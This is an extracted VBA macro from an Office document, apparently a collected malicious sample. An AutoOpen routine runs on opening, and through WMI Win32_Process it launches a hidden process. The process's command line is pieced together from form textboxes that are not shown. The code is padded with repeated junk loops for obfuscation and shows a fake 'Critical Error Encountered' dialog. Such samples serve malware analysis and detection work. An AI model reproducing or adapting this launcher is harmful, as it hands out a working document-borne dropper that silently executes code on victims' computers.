Attribute VB_Name = "Jkojiblr"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Sysuijubkn, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Unbkbkjtjoen, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Wicjckvyrlprr, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Jhwnwhge, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Jcgglshk, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Tyxilfmk, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Dzigugyndj, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Qxuhwwlqqehuw, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Ivcewqnze, 8, 8, MSForms, TextBox"
Attribute VB_Control = "Rxcgefofjvage, 9, 9, MSForms, TextBox"
Attribute VB_Control = "Grkmhoyf, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Roovkfrppfay, 11, 11, MSForms, TextBox"
Attribute VB_Name = "Mgpapknedbmx"
Function Udfcwivjnyyya()
On Error Resume Next
   For Gkiomiflawwh = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Udfcwivjnyyya = CreateObject((Ycrxdzxfiqu)).Create#(Uuqzirzcqd(""), Mgfylvkrwburs, Qwjqsgmk, Ezfcmkojddcg)
   For Gxgkwqtbf = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Xdurfvhqjjc = MsgBox(("Critical Error Encountered"), ("16"), Tyhbmprm.Qudxnbgx)
   For Rmeayqmksl = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
End Function
Sub autoopen()
On Error Resume Next
   For Hknackgcdiwbq = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
   For Zicclisib = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
   For Cgehpyqvvvgvd = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Udfcwivjnyyya
End Sub
Function Qwjqsgmk()
On Error Resume Next
   For Jytyjenoobzsd = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Raphvqroni = Ycrxdzxfiqu
   For Qgmxmeptk = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Kkvlslxtnzqu = Raphvqroni + ("STARTU")
   For Ujydykqivne = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Vgqfwptuvene = Kkvlslxtnzqu + Jkojiblr.Jcgglshk
   For Tddkwfzeoa = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Set Qwjqsgmk = CreateObject((Vgqfwptuvene))
   For Uwflesdpfhfc = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Qwjqsgmk.XSize = False
   For Hfvwoepevfsg = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Qwjqsgmk.YSize = False
   For Ralwqpdz = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
End Function
Function Ycrxdzxfiqu()
On Error Resume Next
   For Vhillvououqma = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Ycrxdzxfiqu = "winmgmts:Win32_Process"
   For Mshitzrhhppll = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
End Function
Function Uuqzirzcqd(Nhkofsnpvcge)
On Error Resume Next
   For Mmwgypuujecua = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Birpqrkh = Jkojiblr.Jcgglshk
   For Vflixmgvc = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Gagexrkvzzu = Birpqrkh + Tyhbmprm.Nsrnrkaxcjp
   For Orivhpkg = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Hmzaqpqyoqure = Gagexrkvzzu + Tyhbmprm.Wimbbono
   For Qemvrznpbxs = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
Uuqzirzcqd = Nhkofsnpvcge + Hmzaqpqyoqure + Nhkofsnpvcge
   For Yavhlewk = 0 To 1
      Do While uvVX181 And eyMF274i
         wGMLU = Oct(Dvza0)
      Loop
      While Msv > 7040
         iuDHz60 = 343 + tUdJ4 * JLHT3F * Oct(68 * Int(4483)) - 370 / ChrW(kQmf - Chr(jpqV1a51 / Tan(WryfXov1 * Wnt) * UzvE * CByte(8 - 8620 - ZRZ + CaVK)) + 70 - 46)
      Wend
      For Each ovywT In cADKMK4GE
         WXGE = 692 / Int(ToL) - AZBF9iC3l + Tan(puHif0 + CDbl(kBcHA9 - CLng(323325919))) - zpa + EAEMd96x * NKrnh8 + Round(jMqe58) * TGpO9d05 * STCa
      Next
      QFbpJQc6 = (NwmyFu - Sgn(oVrK656Z) / (10 - qLzIJN))
      For Each GGBz6r7 In Cijg8
         ScfOmFsu = WQRjlp
      Next
Next
End Function
Attribute VB_Name = "Niaadpyknbhl"
Attribute VB_Name = "Tyhbmprm"
Attribute VB_Base = "0{BCB08743-5DE3-4C3F-B1FC-C7B978D94C79}{06732503-3843-4A3E-BBAA-A488E51A6B06}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zdicarax"


INQUEST-PP=macro
